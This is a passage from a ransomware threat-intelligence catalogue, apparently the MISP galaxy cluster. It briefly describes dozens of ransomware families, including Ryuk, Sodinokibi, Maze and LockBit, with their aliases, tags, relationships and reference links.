<tr>
<td><a href="https://www.youtube.com/watch?v=QevoUzbqNTQ">https://www.youtube.com/watch?v=QevoUzbqNTQ</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/GrujaRS/status/1070011234521673728">https://twitter.com/GrujaRS/status/1070011234521673728</a></td>
</tr>
</tbody>
</table>

**Dablio Ransomware**

The tag is: misp-galaxy:ransomware="Dablio Ransomware"

Dablio Ransomware has relationships with:

- similar: misp-galaxy:ransomware="HolyCrypt" with estimative-language:likelihood-probability="likely"

Table 5575. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/struppigel/status/1069905624954269696">https://twitter.com/struppigel/status/1069905624954269696</a></td>
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</tbody>
</table>

**Gerber Ransomware 1.0**

The tag is: misp-galaxy:ransomware="Gerber Ransomware 1.0"

Table 5576. Table References
Gerber Ransomware 3.0

The tag is: misp-galaxy:ransomware="Gerber Ransomware 3.0"

Outsider

The tag is: misp-galaxy:ransomware="Outsider"

Table 5577. Table References

Links

https://twitter.com/Petrovic082/status/1071003939015925760
https://twitter.com/Emm_ADC_Soft/status/1071716275590782976

JungleSec

Uses http://ccrypt.sourceforge.net/ encryption program

The tag is: misp-galaxy:ransomware="JungleSec"

Table 5578. Table References

Links

https://twitter.com/demonslay335/status/1071123090564923393
https://www.youtube.com/watch?v=iB019lDvArs

EQ Ransomware

GrujaRS discovered the EQ Ransomware that drops a ransom note named README_BACK_FILES.htm and uses *.f**k (censored) as its extension for encrypted files. May be GlobeImposter.

The tag is: misp-galaxy:ransomware="EQ Ransomware"
Mercury Ransomware

extension ".Mercury", note "!!!READ.IT!!!.txt" with 4 different 64-char hex as ID, 3 of which have dashes. Possible filemarker, same in different victim’s files.

The tag is: misp-galaxy:ransomware="Mercury Ransomware"

Table 5580. Table References

<table>
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<tr>
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<tbody>
<tr>
<td><a href="https://twitter.com/GrujaRS/status/1071349228172124160">https://twitter.com/GrujaRS/status/1071349228172124160</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=uHYY6XZZEw4">https://www.youtube.com/watch?v=uHYY6XZZEw4</a></td>
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</table>

Forma Ransomware

The tag is: misp-galaxy:ransomware="Forma Ransomware"

Forma Ransomware is also known as:

- FORMA

Table 5581. Table References

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<tbody>
<tr>
<td><a href="https://twitter.com/demonslay335/status/1072164314608480257">https://twitter.com/demonslay335/status/1072164314608480257</a></td>
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Djvu

The tag is: misp-galaxy:ransomware="Djvu"

Table 5582. Table References

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<tr>
<td><a href="https://twitter.com/GrujaRS/status/1072468548977680385">https://twitter.com/GrujaRS/status/1072468548977680385</a></td>
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</table>

Ryuk ransomware

Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat
actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD.

The tag is: `misp-galaxy:ransomware="Ryuk ransomware"`

**Table 5583. Table References**

<table>
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</table>

**BitPaymer**

In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.

The tag is: `misp-galaxy:ransomware="BitPaymer"`

BitPaymer is also known as:

- FriedEx
- IEncrypt

**Table 5584. Table References**

<table>
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<th>Links</th>
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</table>

**LockerGoga**

The tag is: `misp-galaxy:ransomware="LockerGoga"`

 LockerGoga has relationships with:

- similar: `misp-galaxy:ransomware="Nodera Ransomware"` with `estimative-language:likelihood-probability="roughly-even-chance"`

**Table 5585. Table References**

<table>
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</table>
Princess Evolution

We have been observing a malvertising campaign via Rig exploit kit delivering a cryptocurrency-mining malware and the GandCrab ransomware since July 25. On August 1, we found Rig's traffic stream dropping a then-unknown ransomware. Delving into this seemingly new ransomware, we checked its ransom payment page in the Tor network and saw it was called Princess Evolution (detected by Trend Micro as RANSOM_PRINCESSLOCKER.B), and was actually a new version of the Princess Locker ransomware that emerged in 2016. Based on its recent advertisement in underground forums, it appears that its operators are peddling Princess Evolution as a ransomware as a service (RaaS) and are looking for affiliates. The new malvertising campaign we observed since July 25 is notable in that the malvertisements included Coinhive (COINMINER_MALXMR.TIDBF). Even if users aren't diverted to the exploit kit and infected with the ransomware, the cybercriminals can still earn illicit profit through cryptocurrency mining. Another characteristic of this new campaign is that they hosted their malvertisement page on a free web hosting service and used domain name system canonical name (DNS CNAME) to map their advertisement domain on a malicious webpage on the service.

The tag is: *misp-galaxy:ransomware=*Princess Evolution*

Princess Evolution is also known as:

- PrincessLocker Evolution

Table 5586. Table References

Links


Jokeroo

A new Ransomware-as-a-Service called Jokeroo is being promoted on underground hacking sites and via Twitter that allows affiliates to allegedly gain access to a fully functional ransomware and payment server. According to a malware researcher named Damian, the Jokeroo RaaS first started promoting itself as a GandCrab Ransomware RaaS on the underground hacking forum Exploit.in.

The tag is: *misp-galaxy:ransomware=*Jokeroo*

Jokeroo is also known as:

- Fake GandCrab

Table 5587. Table References

Links
GlobeImposter

During December 2017, a new variant of the GlobeImposter Ransomware was detected for the first time and reported on malware-traffic-analysis. At first sight this ransomware looks very similar to other ransomware samples and uses common techniques such as process hollowing. However, deeper inspection showed that like LockPoS, which was analyzed by CyberBit, GlobeImposter too bypasses user-mode hooks by directly invoking system calls. Given this evasion technique is being leveraged by new malware samples may indicate that this is a beginning of a trend aiming to bypass user-mode security products.

The tag is: `misp-galaxy:ransomware="GlobeImposter"`

Table 5588. Table References

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</table>

BlackWorm

BlackWorm Ransomware is a malicious computer infection that encrypts your files, and then does everything it can to prevent you from restoring them. It needs you to pay $200 for the decryption key, but there is no guarantee that the people behind this infection would really issue the decryption tool for you.

The tag is: `misp-galaxy:ransomware="BlackWorm"`

Table 5589. Table References

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Tellyoutheypass

Tellyoutheypass is a ransomware that alters system files, registry entries and encodes personal photos, documents, and servers or archives. Army-grade encryption algorithms get used to change the original code of the file and make the data useless.

The tag is: `misp-galaxy:ransomware="Tellyoutheypass"`

Table 5590. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malware.wikia.org/wiki/Tellyoutheypass">https://malware.wikia.org/wiki/Tellyoutheypass</a></td>
</tr>
</tbody>
</table>
**BigBobRoss**

BigBobRoss ransomware is the cryptovirus that requires a ransom in Bitcoin to return encrypted files marked with .obfuscated appendix.

The tag is: `misp-galaxy:ransomware="BigBobRoss"`

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<th>Table 5591. Table References</th>
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<tbody>
<tr>
<td>Links</td>
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<tr>
<td><a href="https://www.2-spyware.com/remove-bigbobross-ransomware.html">https://www.2-spyware.com/remove-bigbobross-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Planetary**

First discovered by malware security analyst, Lawrence Abrams, PLANETARY is an updated variant of another high-risk ransomware called HC7.

The tag is: `misp-galaxy:ransomware="Planetary"`

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<th>Table 5592. Table References</th>
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**Cr1ptT0r**

Cr1ptT0r Ransomware Targets NAS Devices with Old Firmware.

The tag is: `misp-galaxy:ransomware="Cr1ptT0r"`

Cr1ptT0r is also known as:

- Criptt0r
- Cr1pt0r
- Cripttor

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<thead>
<tr>
<th>Table 5593. Table References</th>
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<tbody>
<tr>
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<tr>
<td><a href="https://www.coveware.com/blog/2019/3/13/cr1ptt0r-ransomware-targets-nas-devices-with-old-firmware">https://www.coveware.com/blog/2019/3/13/cr1ptt0r-ransomware-targets-nas-devices-with-old-firmware</a></td>
</tr>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r">https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r</a></td>
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</tbody>
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**Sodinokibi**

Attackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called "Sodinokibi." Sodinokibi attempts to encrypt data in a user's
directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco's Incident Response (IR) team, along with Cisco Talos, are actively investigating these attacks and Sodinokibi.

The tag is: `misp-galaxy:ransomware="Sodinokibi"`

Sodinokibi is also known as:

- REvil
- Revil

**Phobos**

Phobos exploits open or poorly secured RDP ports to sneak inside networks and execute a ransomware attack, encrypting files and demanding a ransom be paid in bitcoin for returning the files, which in this case are locked with a .phobos extension.

The tag is: `misp-galaxy:ransomware="Phobos"`

Phobos is also known as:

- Java NotDharma

**GetCrypt**

A new ransomware is in the dark market which encrypts all the files on the device and redirects victims to the RIG exploit kit.

The tag is: `misp-galaxy:ransomware="GetCrypt"`
Nemty

A new ransomware family dubbed “Nemty” for the extension it adds to encrypted files has recently surfaced in the wild. According to a report from Bleeping Computer, New York-based reverse engineer Vitali Kremez posits that Nemty is possibly delivered through exposed remote desktop connections.

The tag is: misp-galaxy:ransomware="Nemty"

Table 5597. Table References

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Buran

Buran is a new version of the Vega ransomware strain (a.k.a. Jamper, Ghost, Buhtrap) that attacked accountants from February through April 2019. The new Buran ransomware first was discovered by nao_sec in June 2019, delivered by the RIG Exploit Kit, as reported by BleepingComputer.

The tag is: misp-galaxy:ransomware="Buran"

Table 5598. Table References

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Hildacrypt

The Hildacrypt ransomware encrypts the victim's files with a strong encryption algorithm and the filename extension .hilda until the victim pays a fee to get them back.

The tag is: misp-galaxy:ransomware="Hildacrypt"

Table 5599. Table References

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Mr. Dec

Mr. Dec ransomware is cryptovirus that was first spotted in mid-May 2018, and since then was updated multiple times. The ransomware encrypts all personal data on the device with the help of AES encryption algorithm and appends .[ID]random 16 characters[ID] file extension, preventing from their further usage.

3118
The tag is: *misp-galaxy:ransomware="Mr.Dec"*

Mr.Dec is also known as:

- MrDec
- Sherminator

*Table 5600. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.2-spyware.com/remove-mr-dec-ransomware.html">https://www.2-spyware.com/remove-mr-dec-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2018/05/mrdec-ransomware.html">https://id-ransomware.blogspot.com/2018/05/mrdec-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Freeme**

Freezing crypto ransomware encrypts user data using AES, and then requires a ransom in # BTC to return the files. Original title: not indicated in the note. The file says: FreeMe.exe

The tag is: *misp-galaxy:ransomware="Freeme"*

Freeme is also known as:

- Freezing

*Table 5601. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2019/06/freeme-freezing-ransomware.html">http://id-ransomware.blogspot.com/2019/06/freeme-freezing-ransomware.html</a></td>
</tr>
</tbody>
</table>

**DoppelPaymer**

We have dubbed this new ransomware DoppelPaymer because it shares most of its code with the BitPaymer ransomware operated by INDRIK SPIDER. However, there are a number of differences between DoppelPaymer and BitPaymer, which may signify that one or more members of INDRIK SPIDER have split from the group and forked the source code of both Dridex and BitPaymer to start their own Big Game Hunting ransomware operation.

The tag is: *misp-galaxy:ransomware="DoppelPaymer"*

*Table 5602. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer">https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer</a></td>
</tr>
</tbody>
</table>

**Desync**

This crypto ransomware encrypts enterprise LAN data with AES (ECB mode), and then requires a
ransom in # BTC to return the files.

The tag is: misp-galaxy:ransomware="Desync"

Table 5603. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2019/01/unnamed-desync-ransomware.html">https://id-ransomware.blogspot.com/2019/01/unnamed-desync-ransomware.html</a></td>
</tr>
</tbody>
</table>

Maze

Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.

The tag is: misp-galaxy:ransomware="Maze"

Maze has relationships with:

- related-to: misp-galaxy:ransomware="Ragnar Locker" with estimative-language:likelihood-probability="likely"

Table 5604. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.maze">https://malpedia.caad.fkie.fraunhofer.de/details/win.maze</a></td>
</tr>
</tbody>
</table>

Cyborg Ransomware

Ransomware delivered using fake Windows Update spam

The tag is: misp-galaxy:ransomware="Cyborg Ransomware"

Table 5605. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</table>

FTCode

A targeted email campaign has been spotted distributing the JasperLoader to victims. While the JasperLoader was originally used to then install Gootkit, Certego has observed it now being used to infect victims with a new ransomware dubbed FTCODE. Using an invoice-themed email appearing
to target Italian users, the attackers attempt to convince users to allow macros in a Word document. The macro is used to run PowerShell to retrieve additional PowerShell code.

The tag is: \textit{misp-galaxy:ransomware="FTCode"}

\textit{Table 5606. Table References}

\begin{tabular}{|l|}
\hline
\textbf{Links} \\
https://exchange.xforce.ibmcloud.com/collection/FTCODE-Ransomware-45dacdc2d5cf30722ced20b9d37988c2 \\
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode \\
\hline
\end{tabular}

\textbf{Clop}

Observed for the first time in February 2019, variant from CryptoMix Family, itself a variation from CryptXXX and CryptoWall family.

The tag is: \textit{misp-galaxy:ransomware="Clop"}

\textit{Table 5607. Table References}

\begin{tabular}{|l|}
\hline
\textbf{Links} \\
\hline
\end{tabular}

\textbf{PornBlackmailer}

A new infection is being distributed by porn sites that tries to blackmail a victim into paying a ransom by stating they will tell law enforcement that the victim is spreading child porn. This is done by collecting information about the user, including screen shots of their active desktop, in order to catch them in compromising situations.

The tag is: \textit{misp-galaxy:ransomware="PornBlackmailer"}

\textit{Table 5608. Table References}

\begin{tabular}{|l|}
\hline
\textbf{Links} \\
\hline
\end{tabular}

\textbf{KingOuroboros}

This crypto-extortioner encrypts user data using AES, and then requires a $ 30- $ 50- $ 80 buy-back to BTC to return the files. The name is original. Written on AutoIt.

The tag is: \textit{misp-galaxy:ransomware="KingOuroboros"}

\textit{Table 5609. Table References}
MAFIA Ransomware

The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.

The tag is: *misp-galaxy:ransomware=*"MAFIA Ransomware"

MAFIA Ransomware is also known as:

- Mafia

5ss5c Ransomware

The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps Iron ransomware, has now come up with a new version or rebranding named 5ss5c. [...] It will however only encrypt files with the following extensions: 7z, bak, cer, csv, db, dbf, dmp, docx, eps, idf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip

The tag is: *misp-galaxy:ransomware=*"5ss5c Ransomware"

Nodera Ransomware

Nodera is a ransomware family that uses the Node.js framework and was discovered by Quick Heal researchers. The infection chain starts with a VBS script embedded with multiple JavaScript files. Upon execution, a directory is created and both the main node.exe program and several required NodeJS files are downloaded into the directory. Additionally, a malicious JavaScript payload that performs the encryption process is saved in this directory. After checking that it has admin privileges and setting applicable variables, the malicious JavaScript file enumerates the drives to create a list of targets. Processes associated with common user file types are stopped and volume shadow copies are deleted. Finally, all user-specific files on the C: drive and all files on other drives are encrypted and are appended with a .encrypted extension. The ransom note containing instructions on paying the Bitcoin ransom are provided along with a batch script to be used for decryption after obtaining the private key. Some mistakes in the ransom note identified by the researchers include the fact that it mentions a 2048-bit RSA public key instead of 4096-bit (the size
that was actually used), a hard-coded private key destruction time dating back almost 2 years ago, and a lack of instructions for how the private key will be obtained after the ransom is paid. These are signs that the ransomware may be in the development phase and was likely written by an amateur. For more information, see the QuickHeal blog post in the Reference section below.

The tag is: *misp-galaxy:ransomware="Nodera Ransomware"*

Nodera Ransomware is also known as:

- Nodera

*Table 5612. Table References*

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<tr>
<td><a href="https://exchange.xforce.ibmcloud.com/collection/6f18908ce6d9cf4efb551911e00d9ec4">https://exchange.xforce.ibmcloud.com/collection/6f18908ce6d9cf4efb551911e00d9ec4</a></td>
</tr>
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</table>

**MegaCortex**

Discovered in May 2019. dropped through networks compromised by trojan like Emotet or TrickBot. Tools and methods used are similar to LockerGoga

The tag is: *misp-galaxy:ransomware="MegaCortex"*

MegaCortex has relationships with:

- similar: *misp-galaxy:ransomware="LockerGoga"* with *estimative-language:likelihood-probability="roughly-even-chance"*

*Table 5613. Table References*

<table>
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<th>Links</th>
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</table>

**RobinHood**

Detected in April 2019. Known for paralyzing the cities of Baltimore and Greenville. Probably also exfiltrate data

The tag is: *misp-galaxy:ransomware="RobinHood"*

RobinHood is also known as:

- HelpYemen

*Table 5614. Table References*

<table>
<thead>
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<th>Links</th>
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Bart ransomware

Bart ransomware is distributed by the same Russian Cyber Mafia behind Dridex 220 and Locky. Bart doesn’t communicate with a command and control (C&C) server, so it can encrypt files without being connected to a computer. Bart is spread to end users via phishing emails containing .zip attachments with JavaScript Code and use social engineering to trick users into opening the 'photo' attachments. The zipped files are obfuscated to make it more hard to tell what actions they are performing. See screenshot above for an example of what they look like. If opened, these attachments download and install the intermediary loader RockLoader which downloads Bart onto the machine over HTTPS. Once executed, it will first check the language on the infected computer. If the malware detects Russian, Belorussian, or Ukrainian, the ransomware will terminate and will not proceed with the infection. If it’s any other language, it will start scanning the computer for certain file extensions to encrypt. Because Bart does not require communication with C&C infrastructure prior to encrypting files, Bart could possibly encrypt machines sitting behind corporate firewalls that would otherwise block such traffic. Thus, organizations need to ensure that Bart is blocked at the email gateway using rules that block zipped executables.

The tag is: misp-galaxy:ransomware="Bart ransomware"

Bart ransomware is also known as:

• Locky Bart

Table 5615. Table References

<table>
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<tr>
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<tbody>
<tr>
<td><a href="https://www.knowbe4.com/bart-ransomware">https://www.knowbe4.com/bart-ransomware</a></td>
</tr>
</tbody>
</table>

Razor

Razor was discovered by dnwls0719, it is a part of Garrantydecrypt ransomware family. Like many other programs of this type, Razor is designed to encrypt files (make them unusable/inaccessible), change their filenames, create a ransom note and change victim’s desktop wallpaper. Razor renames files by appending the ".razor" extension to their filenames. For example, it renames "1.jpg" to "1.jpg.razor", and so on. It creates a ransom note which is a text file named "RECOVERY.txt", this file contains instructions on how to contact Razor’s developers (cyber criminals) and other details. As stated in the "RECOVERY.txt" file, this ransomware encrypts all files and information about how to purchase a decryption tool can be received by contacting Razor’s developers. Victims supposed to contact them via razor2020@protonmail.ch, Jabber client (razor2020@jxmpp.jp) or ICQ client (@razor2020) and wait for further instructions. It is very likely that they will name a price of a decryption tool and/or key and provide cryptocurrency wallet's address that should be used to make a transaction. However, it is never a good idea to trust (pay) any cyber criminals/ransomware developers. It is common that they do not provide decryption tools even after a payment. Another problem is that ransomware-type programs encrypt files with strong encryption algorithms and their developers are the only ones who have tools that can decrypt files encrypted by their ransomware. In most cases victims have the only free and safe option: to restore files from a backup. Also, it is worth mentioning that files remain encrypted even after uninstallation of ransomware, its removal only prevents it from causing further encryptions.
**Wadhrama**

The tag is: *misp-galaxy:ransomware=*"Wadhrama"

Wadhrama has relationships with:

- **used-by:** *misp-galaxy:microsoft-activity-group=*"PARINACOTA"  *with* estimative-language:likelihood-probability="likely"

**Mespinoza**

Mespinoza ransomware is used at least since october 2018. First versions used the common extension ".locked". Since december 2019 a new version in open sourced and documented, this new version uses the ".pyza" extension.

The tag is: *misp-galaxy:ransomware=*"Mespinoza"

Mespinoza is also known as:

- Pyza
- Pysa

**CoronaVirus**

A new ransomware called CoronaVirus has been distributed through a fake web site pretending to
promote the system optimization software and utilities from WiseCleaner. With the increasing fears and anxiety of the Coronavirus (COVID-19) outbreak, an attacker has started to build a campaign to distribute a malware cocktail consisting of the CoronaVirus Ransomware and the Kpot information-stealing Trojan. This new ransomware was discovered by MalwareHunterTeam and after further digging into the source of the file, we have been able to determine how the threat actor plans on distributing the ransomware and possible clues suggesting that it may actually be a wiper.

The tag is: misp-galaxy:ransomware="CoronaVirus"

Table 5619. Table References

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Snake Ransomware

Snake ransomware first attracted the attention of malware analysts in January 2020 when they observed the crypto-malware family targeting entire corporate networks. Shortly after this discovery, the threat quieted down. It produced few new detected infections in the wild for the next few months. That was until May 4, when ID Ransomware registered a sudden spike in submissions for the ransomware.

The tag is: misp-galaxy:ransomware="Snake Ransomware"

Table 5620. Table References

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<th>Links</th>
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eCh0raix

Anomali researchers have observed a new ransomware family, dubbed eCh0raix, targeting QNAP Network Attached Storage (NAS) devices. QNAP devices are created by the Taiwanese company QNAP Systems, Inc., and contain device storage and media player functionality, amongst others. The devices appear to be compromised by brute forcing weak credentials and exploiting known vulnerabilities in targeted attacks. The malicious payload encrypts the targeted file extensions on the NAS using AES encryption and appends .encrypt extension to the encrypted files. The ransom note created by the ransomware has the form shown below. eCh0raix was first seen in June 2019, after victims began reporting ransomware attacks in a forum topic on BleepingComputer. On June 1st, 2020, there has been a sudden surge of eCh0raix victims seeking help in our forums and
submissions to the ransomware identification site ID-Ransomware.

The tag is: misp-galaxy:ransomware="eCh0raix"

Egregor

The threat group behind this malware seems to operate by hacking into companies, stealing sensitive data, and then running Egregor to encrypt all the files. According to the ransom note, if the ransom is not paid by the company within 3 days, and aside from leaking part of the stolen data, they will distribute via mass media where the company’s partners and clients will know that the company was attacked.

The tag is: misp-galaxy:ransomware="Egregor"

Egregor has relationships with:

- variant-of: misp-galaxy:ransomware="Sekhmet" with estimative-language:likelihood-probability="likely"

SunCrypt

SunCrypt ransomware was discovered in October 2019 and in August 2020 it was added to Maze ransomware's cartel. It also follows some of Maze's tactics, techniques, and procedures. SunCrypt is launched and installed using an obfuscated PowerShell script. Infected email attachments (macros), torrent websites, malicious ads act as carriers for this ransomware.

The tag is: misp-galaxy:ransomware="SunCrypt"

SunCrypt is also known as:

- Sun
Suncrypt

Table 5623. Table References

Links


LockBit

LockBit operators tend to be very indiscriminate and opportunistic in their targeting. Actors behind this attack will use a variety of methods to gain initial access, up to and including basic methods such as brute force. After gaining initial access the actor follows a fairly typical escalation, lateral movement and ransomware execution playbook. LockBit operators tend to have a very brief dwell time, executing the final ransomware payload as quickly as they are able to. LockBit ransomware has the built-in lateral movement features; given adequate permissions throughout the targeted environment.

The tag is: misp-galaxy:ransomware="LockBit"

Table 5624. Table References

Links

https://usa.kaspersky.com/resource-center/threats/lockbit-ransomware

WastedLocker

WastedLocker primarily targets corporate networks. Upon initial compromise, often using a fake browser update containing SocGholish, the actor then takes advantage of dual-use and LoLBin tools in an attempt to evade detection. Key observations include lateral movement and privilege escalation. The WastedLocker ransomware has been tied back to EvilCorp.

The tag is: misp-galaxy:ransomware="WastedLocker"

Table 5625. Table References

Links

**Babuk Ranomsware**

Since this is the first detection of this malware in the wild, it's not surprising that Babuk is not obsfuscated at all. Overall, it's a pretty standard ransomware that utilizes some of the new techniques we see such as multi-threading encryption as well as abusing the Windows Restart Manager similar to Conti and REvil. For encrypting scheme, Babuk uses its own implementation of SHA256 hashing, ChaCha8 encryption, and Elliptic-curve Diffie–Hellman (ECDH) key generation and exchange algorithm to protect its keys and encrypt files. Like many ransomware that came before, it also has the ability to spread its encryption through enumerating the available network resources.

The tag is: `misp-galaxy:ransomware="Babuk Ranomsware"`

**Table 5626. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/">http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/</a></td>
</tr>
</tbody>
</table>

**Darkside**

Darkside, the latest ransomware operation to emerge has been attacking organizations beginning earlier this month. Darkside's customized attacks on companies have already garnered them million-dollar payouts. Through their “press release”, these threat actors have claimed to be affiliated with prior ransomware operations making millions of dollars. They stated that they created this new product to match their needs, as prior products didn't. Darkside explains that they only target companies they know that can pay the specified ransom. They have allegedly promised that they will not attack the following sectors. They include medicine, education, non-profit organizations, and the government sector.

The tag is: `misp-galaxy:ransomware="Darkside"`

**Table 5627. Table References**

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://www.wired.com/story/ransomware-gone-corporate-darkside-where-will-it-end/">https://www.wired.com/story/ransomware-gone-corporate-darkside-where-will-it-end/</a></td>
</tr>
<tr>
<td><a href="https://darksidedxcftmqa.onion.foundation/">https://darksidedxcftmqa.onion.foundation/</a></td>
</tr>
</tbody>
</table>

**RansomEXX**

We recently discovered a new file-encrypting Trojan built as an ELF executable and intended to encrypt data on machines controlled by Linux-based operating systems. After the initial analysis we noticed similarities in the code of the Trojan, the text of the ransom notes and the general approach
to extortion, which suggested that we had in fact encountered a Linux build of the previously known ransomware family RansomEXX. This malware is notorious for attacking large organizations and was most active earlier this year. RansomEXX is a highly targeted Trojan. Each sample of the malware contains a hardcoded name of the victim organization. Moreover, both the encrypted file extension and the email address for contacting the extortionists make use of the victim's name.

The tag is: misp-galaxy:ransomware="RansomEXX"

RansomEXX is also known as:

- Ransom X
- Defray777
- Defray-777
- Defray 2018

Table 5628. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx">https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx</a></td>
</tr>
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<td><a href="https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html">https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://github.com/Bleeping/Ransom.exx">https://github.com/Bleeping/Ransom.exx</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4/">https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4/</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/">https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/</a></td>
</tr>
</tbody>
</table>

CovidLock

Mobile ransomware. The Zscaler ThreatLabZ team recently came across a URL named hxxp://coronavirusapp[.]site/mobile.html, which portrays itself as a download site for an Android app that tracks the coronavirus spread across the globe. In reality, the app is Android ransomware, which locks out the victim and asks for ransom to unlock the device. The app portrays itself as a Coronavirus Tracker. As soon as it starts running, it asks the user for several authorizations, including admin rights. In fact, this ransomware does not encrypt nor steal anything and only lock the device with an hard coded code.

The tag is: misp-galaxy:ransomware="CovidLock"

Table 5629. Table References

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</table>
Tycoon

This malware is written in Java and is named after references in the code. Tycoon has been in the wild since December 2019 and has targeted organizations in the education, SMBs, and software industries. Tycoon is a multi-platform Java ransomware that targets Windows and Linux systems. This ransomware denies access to the system administrator following an attack on the domain controller and file servers. The initial intrusion occurs through an internet-facing remote desktop protocol (RDP) jump-server.

The tag is: *misp-galaxy:ransomware*="Tycoon"

Ragnar Locker

Ragnar Locker is a ransomware identified in December 2019 that targets corporate networks in Big Game Hunting targeted attacks. This report presents recent elements regarding this ransomware.

The tag is: *misp-galaxy:ransomware*="Ragnar Locker"

Ragnar Locker is also known as:

- RagnarLocker

Ragnar Locker has relationships with:

- similar: *misp-galaxy:mitre-malware*="Ragnar Locker - S0481" with *estimative-language:likelihood-probability*="likely"
**Sekhmet**

Ransom.Sekhmet not only encrypts a victims files, but also threatens to publish them.

The tag is: `misp-galaxy:ransomware="Sekhmet"`

Sekhmet has relationships with:

- similar: `misp-galaxy:ransomware="Egregor"` with `estimative-language:likelihood-probability="likely"`

**Table 5632. Table References**

<table>
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<tr>
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<tbody>
<tr>
<td><a href="https://blog.malwarebytes.com/detections/ransom-sekhmet/">https://blog.malwarebytes.com/detections/ransom-sekhmet/</a></td>
</tr>
<tr>
<td><a href="https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/">https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/</a></td>
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**$$$

Ransomware

The tag is: `misp-galaxy:ransomware="$$"`

**$ucyLocker**

Ransomware

The tag is: `misp-galaxy:ransomware="$ucyLocker"`

**10001**

Ransomware

The tag is: `misp-galaxy:ransomware="10001"`

**05250lock**

Ransomware

The tag is: `misp-galaxy:ransomware="05250lock"`
0kilobypt
Ransomware
The tag is: misp-galaxy:ransomware="0kilobypt"

1337-Locker
Ransomware
The tag is: misp-galaxy:ransomware="1337-Locker"

24H
Ransomware
The tag is: misp-galaxy:ransomware="24H"

3nCRY
Ransomware
The tag is: misp-galaxy:ransomware="3nCRY"

4rw5w
Ransomware
The tag is: misp-galaxy:ransomware="4rw5w"

5ss5c(5ss5cCrypt)
Ransomware
The tag is: misp-galaxy:ransomware="5ss5c(5ss5cCrypt)"

777(Legion)
Ransomware
The tag is: misp-galaxy:ransomware="777(Legion)"

7h9r
Ransomware
The tag is: misp-galaxy:ransomware="7h9r"
7z Portuguese
Ransomware
The tag is: misp-galaxy:ransomware="7z Portuguese"

AAC
Ransomware
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ABCLocker
Ransomware
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Adonis
Ransomware
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AepCrypt
Ransomware
The tag is: misp-galaxy:ransomware="AepCrypt"

AES-Matrix
Ransomware
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AES-NI: April Edition
Ransomware
The tag is: misp-galaxy:ransomware="AES-NI: April Edition"

Afrodita
Ransomware
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Alco
Ransomware
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AllCry
Ransomware
